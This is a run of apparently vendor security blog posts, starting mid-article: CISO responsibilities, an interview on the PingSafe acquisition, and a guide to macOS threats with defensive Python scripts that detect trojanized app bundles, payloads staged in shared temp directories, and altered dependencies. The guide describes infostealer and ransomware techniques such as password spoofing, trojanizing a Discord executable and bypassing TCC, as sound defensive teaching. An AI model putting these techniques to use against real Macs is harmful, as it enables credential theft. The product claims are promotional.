In doing so, they help to not only mitigate legal and financial risks but also fortify the organization’s reputation and stakeholder trust.

Strategic Business Integration

The evolving nature of the role can be seen in the way that many CISOs are now increasingly viewed as critical enablers in the business ecosystem. In some organizations, their insights and expertise have become invaluable in shaping product development and influencing business strategies by driving technical innovation.

In this regard, they can be key to enhancing relationships with vendors and partners, fostering a security-centric approach in all business interactions and collaborations.

Crisis Management and Incident Response

With cyber threats becoming more sophisticated and pervasive, the modern CISO is not only tasked with preventing security breaches but also with orchestrating a robust incident response (IR) strategy.

They will play a central role in the development and implementation of incident response plans (IRPs), ensuring leaders from all functions are well-prepared in the event of a cyber incident. In many organizations, CISOs collaborate with cross-functional teams, including legal, communications, and IT, to streamline response efforts during a crisis.

In some cases, the role may extend to leading post-incident analyses to understand the root causes and improve response protocols. This typically involves actively engaging with external stakeholders, regulatory bodies, and law enforcement agencies to navigate the legal and reputational ramifications of a security incident.

As crisis managers, CISOs may be expected to steer the organization away from negative fallout after cybersecurity incidents with a strategic and agile approach, minimizing the impact of breaches and maintaining business continuity.

Establishing & Cultivating a ‘Security First’ Business Culture

The modern CISO recognizes the significance of cultivating a robust security culture within the organization. They champion awareness programs, training initiatives, and communication strategies to instill a collective responsibility for cybersecurity among employees.

At the same time, CISOs may be at the forefront of advocating for advanced technologies and innovative solutions to counter evolving cyber threats, leading the evaluation and implementation of cutting-edge tools, artificial intelligence (AI), and machine learning (ML) to fortify their organization’s defenses.

Emerging Trends Impacting CISOs in 2024

The cybersecurity landscape in 2024 brings forth a spectrum of new challenges and technological advancements, necessitating a dynamic and strategic approach from CISOs.

Regulatory Compliance and Transparency: The era of mandatory information sharing is ushered in with stringent cyber laws like the SEC cyber disclosure rule. This shift to obligatory reporting amplifies the need for enhanced cyber transparency, bolstering trust in an organization’s cybersecurity measures.

Security Management Amid Digital Transformation: As businesses rapidly evolve digitally, effective management of security postures is key. CISOs are tasked with maintaining control over digital assets while aligning security strategies with the swift pace of business demands, emphasizing the need for continuous adaptation and learning.

Upgraded Cloud Security: With the rise in data breaches within cloud environments, there’s an increased focus on developing sophisticated cloud security strategies. This trend underscores the importance of comprehensive identity and access management, data encryption, and continuous monitoring to safeguard cloud-based assets.

Enhanced API Security: Following the urgency for cloud security, CISOs are also turning their attention to API security. This involves a meticulous process of identifying all APIs within the organization and assessing whether existing tools suffice in terms of visibility, control, and compliance.

AI-Driven Security Tools: The advancement of AI technology has led to a surge in AI-driven security tools. These tools not only enhance defensive capabilities but also provide strategic advantages in optimizing the deployment of existing talent and resources.

Cyber Resilience: Facing an array of evolving threats, there’s a concerted effort to build a strong security culture and improve detection, prevention, and response capabilities. This includes comprehensive updates to business continuity plans, disaster recovery strategies, and incident response protocols, ensuring an all-encompassing approach to cyber resilience.

These emerging trends underline the need for CISOs to be proactive, adaptable, and strategic. The role of the CISO is progressively evolving, requiring a blend of technical expertise, strategic planning, and leadership skills to navigate the new challenges in the cybersecurity domain effectively.

What Lies Ahead for CISOs?

As paradigms shift in tandem with rapid changes in the cyber threat landscape, proactive CISOs can work to understand these changes and revamp security within their organizations.

We enter 2024 recognizing the importance of addressing not only traditional cybersecurity concerns but also much else that has only recently come over the horizon: the need to secure physical infrastructure, IoT devices, SCADA systems, and ensure the safety of remote personnel. Add to this the new focus on cloud security, AI and stricter regulatory and compliance rules and we face an expansion that reflects the growing complexity of cybersecurity, where the digital and physical realms intersect, demanding a comprehensive approach to secure diverse assets.

Further, the widened scope of responsibilities is extending beyond digital asset management to encompass holistic organizational risk. This approach involves identifying, assessing, and mitigating risks across all facets of the organization, ensuring resilience and continuity in an ever-changing threat landscape. CISOs are now integral to not just securing data but safeguarding the entire organizational ecosystem.

In terms of resources, CISOs are equipping themselves with technical tools that aid core functions and support their expanded responsibilities. The arsenal includes technologies for threat intelligence, real-time monitoring, and adaptive defenses. As technology becomes more intertwined with business operations, CISOs will increasingly leverage advanced tools to stay ahead of cyber threats.

Conclusion

The landscape for CISOs in this new year continues to unfold, with emerging trends and innovative technologies impacting their strategies and responsibilities.

The role of CISOs in today’s world is multifaceted and dynamic, going beyond traditional IT security to encompass a wide spectrum of strategic, operational, and leadership responsibilities. As part of the cybersecurity community, CISOs are collectively striving to not only protect their organizations from cyber threats, but also to drive forward-thinking strategies that align with and support business objectives.

SentinelOne’s AI-driven Singularity platform is designed to support CISOs as they safeguard their organizations from current and future threats on all attack surfaces. SentinelOne offers two free eBooks, 90 Days | A CISO’s Journey to Impact – Define Your Role and 90 Days | A CISO’s Journey to Impact – How to Drive Success, as resources for CISOs working to implement best practices in their business. For in-depth expertise and guidance, contact us for more information or book a demo.

The Next (And Very Necessary) Evolution of Cloud Security | SentinelOne Acquires PingSafe

Ric Smith, CTO, SentinelOne

Public cloud adoption and cloud native development are often touted as the future; it’s the “green grass for nimble start-ups and the digital transformation vision” across established industries. And yet, within the opportunity of the cloud, there has long been an ugly security reality brewing.

Cloud Security is broken, and outdated.

To unpack this reality and help me outline the next (and very necessary evolution) of Cloud Security, I would like to welcome my new colleague Anand Prakash, CEO and Co-founder of PingSafe.

Anand has a wealth of experience both attacking and defending cloud architectures, and is considered one of the world’s top five ethical hackers and prolific security researchers. His prolific work since 2012 has assisted over 400 companies in constructing “secure-by-design” tech systems, reflecting his forward-thinking mindset as the shift from on-premises to cloud computing emerged.

Anand, what is the current state of cloud security?

Anand Prakash, CEO, PingSafe

Thank you Ric, and can I just start by saying it’s a pleasure and very exciting to be here!

The reality today is that while there are strong tools focused on solving multiple cloud security issues, whether open-source, 3rd party, or built natively in cloud service providers, they have not been designed to work together in addition to being built with purely defensive intentions.

What I mean by that is that these tools are built targeting “perfection”. I constantly see companies trying to sort through pages of endless CVE vulnerabilities or checking off compliance standards and benchmarks. But they still get hacked even after doing all of this because attackers are finding different ways to hack into a company’s cloud environment, often combining multiple vulnerabilities to create an Exploit Path.

Current “cloud security” tools and platforms are helping keep these teams busy but are not really effective. The result is NOT security for cloud environments.

How many high profile cloud breaches had all of the expected security policies and compliance badges in place? And yet the breach still occurred.

Before founding PingSafe, I was helping major software companies identify bugs in their code, APIs, and infrastructure. During this period, I witnessed issues firsthand, such as attackers exploiting SSRF vulnerabilities in the target’s cloud environment to obtain the company’s cloud credentials through the metadata service (from external endpoints without direct access to their cloud environment). Additionally, incidents like subdomain takeovers due to lingering DNS entries resulted in subdomain defacement, and led companies to pay substantial bounties.

Despite the use of CSPM solutions by these companies, ethical hackers like myself continued to discover highly critical issues overlooked by these tools. This experience motivated me to create PingSafe, addressing these gaps and safeguarding customers’ cloud assets on a large scale.

Attackers have clarity with an offensive mindset, not focused on what doors are closed, but on valid, dangerous opportunities that allow for Initial Access and a large enough scope to conduct an attack.

Unfortunately, the work is heavier for defenders. Defenders have to cover and protect an ever expanding, dynamic, always changing cloud attack surface and attempt to protect everything, while attackers only need that single opportunity to sneak in.

Ric

And this remains a problem, even while we are seeing some vendors consolidate point solutions, and industry talk about the contextual benefit of CNAPP solutions? Anand, would you mind also explaining the acronym for us?

Anand

Cloud Native Application Protection Platforms! Much better as an acronym. This is a recent naming convention from Gartner. CNAPPs are solutions that combine visibility and security across three main areas: the development pipeline, cloud services (storage, identity, database), and cloud & container infrastructure.

While combining these controls in a single platform helps some organizations cut down their vendors, their main problems remain. The issue isn’t switching consoles for container pipeline scanning versus control permissions on cloud storage, it’s that generally cloud security is overwhelmingly noisy. They don’t know what is the most critical issue to solve and where to focus their time.

It’s why I believe, and created PingSafe with this intention, that an attacker’s mindset is needed to drive prioritization in cloud security. What needs to be fixed, now? For example, instead of assessing a never-ending set of theoretical attack paths, I think defenders need to know where their cloud is offering immediately exploitable activity for threat actors. Show me the evidence-based reporting that there is an Exploit Path.

Ric

Let’s spend a little time there – Attack Path vs Exploit Path?

Anand

I’m a big fan of Attack Paths, and many CNAPPs have embraced Attack Paths. They are graphical views of mapped resources with contextual awareness of vulnerabilities, misconfigurations, and public access. However, these combinations do not always equate to a genuine exploitable risk. Attack Paths are a good start, representing theoretical possibilities, but they often provide security teams with fool’s gold.

We can do better. Defenders deserve better.

What we have built with PingSafe is an Offensive Attack Engine that plays the role of an attacker and safely simulates attacks to validate which Attack Paths are actual verified Exploit Paths.

We want to give security practitioners false-positive free, evidence-based reporting to cut through the noise. This is true prioritization.

Ric

It always comes back to signals versus noise. With limited resources and time versus increasing sophistication of cloud attacks, focus on what matters.

We have always believed that beyond robust and capable platforms, today’s security teams need intelligent automation that simplifies the analyst experience and boosts the productivity of their security teams. They need to drastically reduce mean time to detect, and mean time to respond & remediate.

A note on Agent-based and Agentless Cloud Security

Anand

This year we have heard conversations move from Agent vs Agentless to Agent and Agentless, should we talk about that?

Ric

Yes, so there are clear strengths on both sides. SentinelOne has always known that agent-based security allows superior stopping power for attacks as they happen, and increases remediation opportunities. It also allows access to more detailed forensics, so crucial to analysts.

Anand

And agentless controls allow security to extend beyond compute and containers to cloud services like cloud identity, cloud database, and cloud firewall. It also allows for security and visibility free of deployment dependencies.

Ric

Clearly, the answer is that combination of the two makes magic happen! This has been validated by some of the primarily agentless CNAPP vendors, who have publicly reversed their anti-agent stance and are now hard at work building their sensors/agents.

The reality is, however, that while agentless security can be quick to build, agents are not. Building an AI-backed lightweight agent that goes beyond rule-based security, and is capable of machine speed detections with low CPU usage is no easy engineering feat.

We are confident our ability to integrate with PingSafe’s innovative features outpaces agentless vendors who lack the engineering background necessary to create competitive sensors/agents.

Which leads to our combined efforts to redefine the future of cloud security

SentinelOne, as a leader in agent-based Cloud Workload Security (CWS) as well as Cloud Data Security (CDS), has been laser focused on keeping production environments secure.

With the PingSafe acquisition, SentinelOne expands our cloud security capabilities to include Cloud Security Posture Management (CSPM), Container Image Vulnerability Management, Kubernetes Security Posture Management (KSPM), and Infrastructure as Code (IaC) security. Crucially, PingSafe brings their industry-first attacker approach.

In addition to the Offensive Engine that Anand has described and that highlights legitimate Exploit Paths, there is also advanced Secrets Security that provides internal and external hunting for secrets to help secure sensitive information and prevent unauthorized access due to credential leakage.

Together, SentinelOne presents the future of cloud security

A modern and comprehensive CNAPP that will eliminate the need for companies to navigate the complexity of multiple-point solutions, triage and investigate with incomplete context, or pipe data between disparate data silos. A single AI-powered platform to manage your entire cloud attack surface with prioritized, validated insights. Keep your cloud secure with the full context, real-time interaction and analytics needed to correlate, detect and stop multi-stage attacks in a simple, automated way.

Our commitment is to provide practitioners the industry’s most impactful CNAPP, ensuring best in breed security meets best in class usability and accelerated paths to value.

We are very excited by what we can achieve together. You can read more details about our PingSafe acquisition here.

Ric and Anand.

Protecting macOS | 7 Strategies for Enterprise Security in 2024

Welcome to 2024! It may be a new year for us all, but it’s very much business as usual for cybersecurity professionals. Last year saw an increase in the number and variety of new threats targeting the macOS platform, and as the influence of the Mac continues to expand in enterprise environments, there is little doubt that 2024 will continue that trend.

In this post, we reflect on the lessons we can learn from the last 12 months of threat activity against Apple’s desktop operating system, and offer 7 strategies for defenders to help bolster their threat hunting, detection and mitigation efforts.

1. Don’t Rely on Persistence for Detection

Perhaps the most important lesson that defenders learned from 2023’s crop of macOS malware was that monitoring for persistence methods became a much less reliable way of detecting and hunting threat activity.

2023 saw Mac malware make a significant shift away from OS persistence mechanisms, in part due to Apple introducing notifications for background login items. Instead, infostealers grabbed “all the good stuff” – online credentials, session cookies, keychains – and exfiltrated it in a single hit. Other threat actors made clever use of trojanizing regularly launched software, effectively using the victim’s own behavior as a method of persistence.

Atomic Stealer (aka “Amos” / “Soma”) was one of the most widespread of a number of different infostealers that emerged during 2023 and eschewed LaunchAgents, LaunchDaemons and other background login mechanisms. Instead, the malware makes use of an AppleScript password spoof to grab the user’s login password in clear text, and uses this to decrypt the keychain and access other stored credentials.

Having stolen everything – including those all important session cookies and internet account credentials – in one fell swoop, the threat actors had no need to ensure the malware ran again. Importantly, avoiding persistence meant evading detection via Apple’s recently introduced Login Items notifications, giving the thieves plenty of time to make use of the stolen credentials.

Atomic Stealer uses a crude but effective means of extracting the user’s login password via AppleScript spoofing

In a different approach, the SmoothOperator (aka 3CX Supply Chain Attack) campaign similarly avoided using OS persistence mechanisms, instead relying on trojanizing an application that the user would launch frequently.

A more elaborate version of the same idea was employed in the KandyKorn campaign, which trojanized the Discord application. A Mach-O payload was written to /Applications/Discord.app/Contents/MacOS/Discord by a previous malware stage, temporarily renaming the genuine Discord executable to .lock. When the user subsequently launches Discord, the payload renames itself to MacOS.tmp, renames the .lock file back to Discord, and executes both the genuine Discord binary and the previous stage malware, causing the entire renaming/reloading process to repeat.
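One defensive check that follows from the swap described above, written here as an added example and not code from SentinelOne or from the KandyKorn research: inspect each bundle’s Contents/MacOS for entries that Info.plist does not declare, look specifically for the .lock and MacOS.tmp names, and confirm the signature with codesign where that tool exists. The demo bundle it builds is constructed, and the “suspicious” verdict logic and the reliance on CFBundleExecutable are assumptions of this example.

```python
import os
import plistlib
import shutil
import subprocess
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# File names the text ties to the KandyKorn swap inside Contents/MacOS.
KNOWN_SWAP_ARTEFACTS = {".lock", "MacOS.tmp"}


def bundle_executable(app: Path) -> Optional[str]:
    """Return CFBundleExecutable from Contents/Info.plist, or None if unreadable."""
    info = app / "Contents" / "Info.plist"
    try:
        with info.open("rb") as fh:
            value = plistlib.load(fh).get("CFBundleExecutable")
    except (OSError, plistlib.InvalidFileException):
        return None
    return value if isinstance(value, str) else None


def unexpected_macos_entries(app: Path) -> List[str]:
    """Entries in Contents/MacOS other than the declared executable.

    Some legitimate bundles ship helper binaries here, so treat extras as
    leads to triage rather than a verdict on their own.
    """
    macos = app / "Contents" / "MacOS"
    if not macos.is_dir():
        return []
    declared = bundle_executable(app)
    return sorted(n for n in os.listdir(macos) if n != declared)


def codesign_ok(app: Path) -> Optional[bool]:
    """Verify the bundle signature with codesign; None when the tool is absent."""
    tool = shutil.which("codesign")
    if tool is None:
        return None
    result = subprocess.run([tool, "--verify", "--deep", "--strict", str(app)],
                            capture_output=True)
    return result.returncode == 0


def assess_bundle(app: Path) -> Dict[str, object]:
    """Collect the signals for one bundle. 'suspicious' is set by swap artefacts
    or by a signature that fails verification (unsigned apps will trip this)."""
    extras = unexpected_macos_entries(app)
    swap_hits = sorted(set(extras) & KNOWN_SWAP_ARTEFACTS)
    signed = codesign_ok(app)
    return {
        "bundle": str(app),
        "declared_executable": bundle_executable(app),
        "unexpected": extras,
        "swap_artefacts": swap_hits,
        "codesign_ok": signed,
        "suspicious": bool(swap_hits) or signed is False,
    }


def scan_applications(root: Path = Path("/Applications")) -> List[Dict[str, object]]:
    """Assess every *.app directly under root and return the suspicious ones."""
    findings = (assess_bundle(p) for p in sorted(root.glob("*.app")))
    return [f for f in findings if f["suspicious"]]


def build_demo_bundle(parent: Path, trojanized: bool = True) -> Path:
    """Construct a fake Discord.app (no real Discord code) so the check runs offline.

    With trojanized=True the renamed original sits beside the executable as
    '.lock', mirroring the layout the text describes for the KandyKorn stage.
    """
    app = parent / "Discord.app"
    macos = app / "Contents" / "MacOS"
    macos.mkdir(parents=True, exist_ok=True)
    with (app / "Contents" / "Info.plist").open("wb") as fh:
        plistlib.dump({"CFBundleExecutable": "Discord"}, fh)
    # Constructed placeholder: a 64-bit Mach-O magic followed by zeros, not a real binary.
    (macos / "Discord").write_bytes(b"\xcf\xfa\xed\xfe" + b"\x00" * 28)
    if trojanized:
        (macos / ".lock").write_bytes(b"renamed genuine executable (constructed)")
    return app


if __name__ == "__main__":
    demo = build_demo_bundle(Path(tempfile.mkdtemp()))
    print(assess_bundle(demo))
    for finding in scan_applications():
        print(finding)
```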

2. Assume Users Can and Will Override Apple Security

Apple has done much work to improve macOS security in recent iterations of the operating system, focusing heavily on privacy and data protections (more on that below) as well as making improvements to its malware remediation tools (formerly MRT, now known as XProtectRemediator). Other changes are in development – in 2023, we saw the first signs of XProtect’s prototype “bastion rules”, which at present silently log access to various data files.

However, unlike iOS, it is part of the DNA of macOS that users can, if they choose, perform actions that contradict the standing OS security policy. Users can execute unsigned code, or even override XProtect’s warning that a file is known malware.

A malicious file’s Info panel allows users to override XProtect

The ability of users to override Apple’s built-in security is a boon for threat actors and a headache for Mac admins. Without deploying an enterprise-level security solution that prevents users from executing suspicious or malicious code, Mac admins are powerless to prevent social engineering attacks from compromising their networks.

In 2023, unsigned or ad-hoc signed malware was by far the most common type of threat seen across the macOS platform. Such malware was used by all levels of actors, from DPRK-aligned campaigns like RustBucket to infostealers like MetaStealer and Realst Stealer. The social engineering used to deliver it ranges from sophisticated campaigns involving impersonation and engagement via social media to simply offering users cracked versions of software they do not wish to pay for.

In either case, the route to compromise involves only convincing the user to take a few extra steps to launch the malware. This works regardless of whether the user is admin or not.

Atomic MacStealer masquerades as legitimate applications
Malware beats Gatekeeper with simple instructions for users

3. Don’t Let iOS Exploits Come Back to Haunt Unpatched Macs

2023 saw a record number of zero days impact Apple’s mobile iOS platform, with multiple reports throughout the year of vulnerabilities said to have been exploited in the wild. Although these primarily targeted iPhone users, many of these bugs have a potential exploitation path on macOS.

As enterprise Mac users are under less pressure to update than iOS users, there is undoubtedly a large attack surface waiting to be exploited by attackers: it is not uncommon for threat actors (or, indeed, red teams) to await write-ups from security researchers describing patched bugs and then develop exploits for them.

The 19 zero days Apple patched in 2023 were less than 4% of the 515 patched throughout the year. For security teams defending macOS endpoints, keeping the OS up-to-date is a straightforward policy that should be implemented with as little delay as possible.

0-Day CVE ID      Module
CVE-2022-42856    WebKit
CVE-2023-23529    WebKit
CVE-2023-28204    WebKit
CVE-2023-28205    WebKit
CVE-2023-28206    IOSurfaceAccelerator
CVE-2023-32373    WebKit
CVE-2023-32409    WebKit
CVE-2023-32434    Kernel
CVE-2023-32435    WebKit
CVE-2023-32439    WebKit
CVE-2023-37450    WebKit
CVE-2023-38606    Kernel
CVE-2023-41061    Wallet
CVE-2023-41064    ImageIO
CVE-2023-41990    FontParser
CVE-2023-41991    Security
CVE-2023-41992    Kernel
CVE-2023-41993    WebKit
CVE-2023-42824    Kernel

4. macOS Ransomware Makes Headlines, But Focus on Data Theft

With ransomware a leading cause of compromise of enterprise Windows systems and increasingly targeting Linux, Cloud and ESXi servers, any new ransomware threats targeting macOS are always headline news. Macs have remained stubbornly immune to major ransomware campaigns, largely because Macs are individual endpoints rather than servers and there is no obvious wormable propagation method to spread from Mac to Mac; as a result, ransomware developers have had little motive to invest in developing Mac-specific ransomware payloads.

2023 saw the first signs that might change after researchers discovered a prototype LockBit payload for Macs. The macOS samples are compiled solely for the Apple ARM M1/M2 (aka Apple silicon) architecture. No macOS Intel sample is known at this time.

Importantly for concerned users, no occurrences of LockBit for Mac have been reported in the wild, no victims claimed, and no distribution method is known to be associated with the malware. The Mac variant appears to be a direct descendant of the LockBit for Linux variant first spotted in Jan 2022, and contains much the same code.

Another ransomware payload dubbed ‘Turtle’ also came to light in November. Unlike the LockBit sample, Turtle is written in Go and targets the Intel x86_64 architecture.

Turtle ransomware is written in Go

However, Turtle ransomware – while technically capable of locking files – has also yet to be seen in the wild or associated with any means of distribution. Given that the sample uses symmetric encryption with a hardcoded key, this also seems like a proof of concept, as victims could decrypt any locked files using the same key.

Turtle ransomware used the hardcoded encryption key “wugui123wugui123”

While it’s reasonably likely that threat actors will continue to experiment with macOS ransomware payloads, we maintain that file locking remains a low-priority threat for Mac defenders. As we have seen elsewhere in the ransomware ecosystem, extortion via data theft has become far more profitable for threat actors.

Given the continued increase in use of Mac computers by C-suite level executives and by developers with access to highly valuable proprietary code, we suggest that the most likely avenue for existing ransomware gangs to pursue regarding macOS targets is the same as the infostealers mentioned above: stealing data, login credentials, and keychains is by far the most lucrative way to extort money from enterprises with Macs in their fleets.

5. Monitor Where Apple’s Data Privacy Protections Fail to Tread

Much of Apple’s focus in hardening macOS over the last few years has revolved around extending a series of data privacy protections known as “TCC”: transparency, consent and control. Any Mac user of recent versions of the OS will have encountered TCC in some form or another: usually via prompts asking for permission to access folders such as the Desktop, Documents or Downloads, or hardware such as the microphone or camera.

We have discussed TCC at length in the past, and much of what we said then remains true as we head into 2024. Threat actors (and researchers) continue to find multiple, creative ways around these controls, and patches for many known TCC bypasses figure prominently in 2023’s macOS updates. Others remain unpatched.

In addition to bypassing or hijacking TCC permissions of other applications, malware authors have also taken to simply avoiding writing or accessing folders that might require TCC consent. Two destinations that are always accessible to read and write that malware commonly makes use of are /Users/Shared/ and /private/etc/tmp (aka “tmp”). We’ve also seen some use of the separate /private/var/tmp and the Darwin users’ $TEMP directory for staging malware and downloading payloads.

Deobfuscated strings found in shared.dat backdoor
Deobfuscated strings found in later stage of JokerSpy backdoor

Typically, these locations are used to create malicious application bundles or binaries, launch them, and then ask for permissions to access data of interest, an execution chain that can sidestep TCC controls just so long as the victim willingly offers up a password.

Defenders are advised to pay increasing attention to these locations, particularly in light of the rise of infostealers that eschew persistence and the other common behavioral patterns noted earlier.

6. Have Runtime, Will Travel | Treat Larger Downloads With Suspicion

Python 2.6 was an ever-present staple in the macOS environment, even long after the widespread adoption of Python 3 elsewhere, and macOS malware authors have a long history of abusing it. However, after Apple removed Python as a system binary, many threat actors responded by switching to cross-platform languages like Go.

In 2023, we saw a great deal of Go-based malware, from infostealers like Atomic to Cobalt Strike implementations like Geacon. In the wild, Geacon payloads were observed in what appeared to be targeted campaigns using phishing document lures and masquerading as fake enterprise-level software.

SecureLink trojan
Geacon dropper masquerading as enterprise software

Along with Go, Rust payloads have also started to become more common. In some cases, malware authors that preferred to continue using Python responded by packaging the Python runtime with their malware.

Whether it’s Go, Rust or Python, all of these approaches result in larger payloads, as the malware carries its own runtime environment with it, a fact that macOS defenders can and should factor into their detection and threat hunting routines.
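A hunting script covering both strategy 5 and the runtime point above, added here as an example and not SentinelOne’s code: it lists recently modified Mach-O files and .app bundles in the TCC-free staging directories the text names, then triages each hit for the bundled-runtime strings and oversized payloads that a carried Go, Rust or Python runtime leaves behind. Assumptions: the text’s “tmp” is written as /private/tmp (the path macOS resolves /tmp to), TMPDIR stands in for the users’ temp directory, and the marker strings and 5 MiB threshold are tunable hunting heuristics, not signatures.

```python
import os
import time
from pathlib import Path
from typing import Dict, Iterator, List, Optional, Sequence

# Locations the text singles out as writable without TCC consent. TMPDIR is the
# per-user temp directory (an assumption about the "$TEMP" the text mentions).
STAGING_DIRS: List[str] = ["/Users/Shared", "/private/tmp", "/private/var/tmp",
                           os.environ.get("TMPDIR", "")]

# Mach-O magics in both byte orders plus the fat/universal magic (which Java
# class files share, so a .class file would be a false positive here).
MACHO_MAGICS = {b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
                b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",
                b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca"}

# Strings a bundled runtime tends to leave in the binary. Assumed heuristics
# for hunting, not signatures; tune them against your own samples.
RUNTIME_MARKERS: Dict[str, Sequence[bytes]] = {
    "go": (b"Go buildinf:", b"runtime.gopanic"),
    "rust": (b"/rustc/", b"core::panicking"),
    "python": (b"libpython", b"Py_Initialize", b"pyi-runtime-tmpdir"),
}
LARGE_BYTES = 5 * 1024 * 1024  # assumed threshold for "carries its own runtime"


def is_macho(path: Path) -> bool:
    """True when the file starts with a Mach-O or fat magic."""
    try:
        with path.open("rb") as fh:
            return fh.read(4) in MACHO_MAGICS
    except OSError:
        return False


def runtime_markers(path: Path, chunk: int = 1 << 20) -> List[str]:
    """Languages whose marker strings appear anywhere in the file."""
    found = set()
    # Keep a tail so a marker split across two chunks is still seen.
    overlap = max(len(m) for ms in RUNTIME_MARKERS.values() for m in ms) - 1
    tail = b""
    with path.open("rb") as fh:
        while True:
            block = fh.read(chunk)
            if not block:
                break
            buf = tail + block
            for lang, markers in RUNTIME_MARKERS.items():
                if lang not in found and any(m in buf for m in markers):
                    found.add(lang)
            tail = buf[-overlap:]
    return sorted(found)


def recent_candidates(dirs: Sequence[str], max_age_s: float,
                      now: Optional[float] = None) -> Iterator[Path]:
    """Yield .app bundles (not descended into) and Mach-O files newer than max_age_s."""
    cutoff = (time.time() if now is None else now) - max_age_s
    for d in dirs:
        if not d or not os.path.isdir(d):
            continue
        for dirpath, dirnames, filenames in os.walk(d):
            for name in list(dirnames):
                if name.endswith(".app"):
                    dirnames.remove(name)  # treat the bundle as one unit
                    app = Path(dirpath) / name
                    if app.stat().st_mtime >= cutoff:
                        yield app
            for name in filenames:
                f = Path(dirpath) / name
                if f.is_symlink() or not f.is_file():
                    continue
                if f.stat().st_mtime >= cutoff and is_macho(f):
                    yield f


def triage(hit: Path) -> Dict[str, object]:
    """Size and runtime verdict for one candidate; bundles are reported as-is."""
    if hit.is_dir():
        return {"path": str(hit), "kind": "app-bundle", "size": None,
                "large": False, "runtimes": []}
    size = hit.stat().st_size
    return {"path": str(hit), "kind": "mach-o", "size": size,
            "large": size >= LARGE_BYTES, "runtimes": runtime_markers(hit)}


def hunt(dirs: Sequence[str] = STAGING_DIRS, max_age_s: float = 24 * 3600) -> List[Dict[str, object]]:
    return [triage(p) for p in recent_candidates(dirs, max_age_s)]


def build_demo_tree(root: Path) -> Path:
    """Constructed sample content so the hunt runs offline (nothing here is real malware)."""
    root.mkdir(parents=True, exist_ok=True)
    # Fake Go-built Mach-O: 64-bit magic, padding, then a Go buildinfo marker.
    (root / "updater").write_bytes(b"\xcf\xfa\xed\xfe" + b"\x00" * 4096
                                   + b"Go buildinf:" + b"\x00" * 64)
    (root / "notes.txt").write_text("plain text, ignored\n")
    (root / "Installer.app" / "Contents" / "MacOS").mkdir(parents=True, exist_ok=True)
    stale = root / "old_tool"  # a Mach-O older than the hunting window
    stale.write_bytes(b"\xcf\xfa\xed\xfe" + b"\x00" * 64)
    ten_days_ago = time.time() - 10 * 86400
    os.utime(stale, (ten_days_ago, ten_days_ago))
    return root


if __name__ == "__main__":
    import tempfile
    demo = build_demo_tree(Path(tempfile.mkdtemp()) / "Shared")
    for finding in hunt([str(demo)]) + hunt():
        print(finding)
```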

7. Secure the Software Supply Chain

Some of the most severe attacks on organizations occur through the supply chain. The previously mentioned 3CX/SmoothOperator campaign is notable among these. A trend in evidence extending beyond last year involves compromise of open source software projects, including libraries distributed via package managers and public repositories like PyPI, crates.io and of course GitHub.

As threat actors continue to increase their focus on Macs in the enterprise, we expect to see further attention paid to vulnerabilities in widely used software, as well as the creation and spoofing of code repos for common tasks, particularly with the availability of LLMs like ChatGPT that can easily reproduce such code.

Last year, for example, JokerSpy malware appeared to be using a trojanized QR code generator to achieve initial compromise. The threat actors used an existing project for a commonly required task and inserted a small malicious file among the many legitimate files included.

QRLog changes the path separator to suit Windows or Posix-compatible systems like Linux and macOS

This puts the onus on security teams to fully vet code introduced from external sources, to ensure that the code, once vetted, is versioned and maintained by the organization, and that updates are also properly scrutinized. That’s not a simple task and it means thinking about a full DevSecOps environment, or ensuring that macOS-related code is included in any DevSecOps processes that currently exist.
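One concrete way to make that scrutiny mechanical, added here as an example and not code from SentinelOne or any QR code project: hash every file in the vetted copy of an external dependency into a manifest, and diff each later update against it so that a single inserted or altered file (the pattern described above) is listed by name. The sample project and its “update” are constructed; the skipped directory names are an assumption.

```python
import hashlib
import json
from pathlib import Path
from typing import Dict, List

SKIP_DIRS = {".git", "node_modules", "__pycache__"}  # assumed noise to leave out


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for block in iter(lambda: fh.read(1 << 16), b""):
            h.update(block)
    return h.hexdigest()


def tree_manifest(root: Path) -> Dict[str, str]:
    """Map each regular file's path relative to root (POSIX form) to its SHA-256."""
    manifest: Dict[str, str] = {}
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root)
        if any(part in SKIP_DIRS for part in rel.parts):
            continue
        if path.is_file() and not path.is_symlink():
            manifest[rel.as_posix()] = sha256_file(path)
    return manifest


def diff_manifests(vetted: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Files the vetted snapshot lacked, lost, or whose bytes changed since vetting."""
    both = set(vetted) & set(current)
    return {
        "added": sorted(set(current) - set(vetted)),
        "removed": sorted(set(vetted) - set(current)),
        "modified": sorted(p for p in both if vetted[p] != current[p]),
    }


def write_manifest(root: Path, out: Path) -> None:
    """Record the vetted state; keep this file outside the tree it describes."""
    out.write_text(json.dumps(tree_manifest(root), indent=2, sort_keys=True))


def check_against_manifest(root: Path, manifest_file: Path) -> Dict[str, List[str]]:
    vetted = json.loads(manifest_file.read_text())
    return diff_manifests(vetted, tree_manifest(root))


def build_demo_project(root: Path) -> Path:
    """Constructed stand-in for a small vetted QR code library (not QRLog itself)."""
    (root / "qrgen").mkdir(parents=True, exist_ok=True)
    (root / "qrgen" / "__init__.py").write_text("VERSION = '1.0'\n")
    (root / "qrgen" / "encode.py").write_text("def encode(s):\n    return s.encode()\n")
    (root / "README.md").write_text("# qrgen (constructed sample)\n")
    return root


def apply_demo_update(root: Path) -> None:
    """Simulate a later 'update' that slips one extra file in and edits another."""
    (root / "qrgen" / "encode.py").write_text(
        "import os\ndef encode(s):\n    return s.encode()\n")
    (root / "qrgen" / "_compat.py").write_text("# constructed: the one file nobody asked for\n")


if __name__ == "__main__":
    import tempfile
    proj = build_demo_project(Path(tempfile.mkdtemp()) / "qrgen-vendored")
    manifest = proj.parent / "qrgen.manifest.json"
    write_manifest(proj, manifest)
    apply_demo_update(proj)
    print(check_against_manifest(proj, manifest))
```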

Conclusion

Enterprise security has, for good reason, been focused on securing Windows systems for so long that it is easy to overlook the Macs in the organization’s fleet. Apple has worked hard to market Macs as ‘secure by design’, but the reality has always been that Macs flew under the radar because the incentive to target them was not nearly so great.

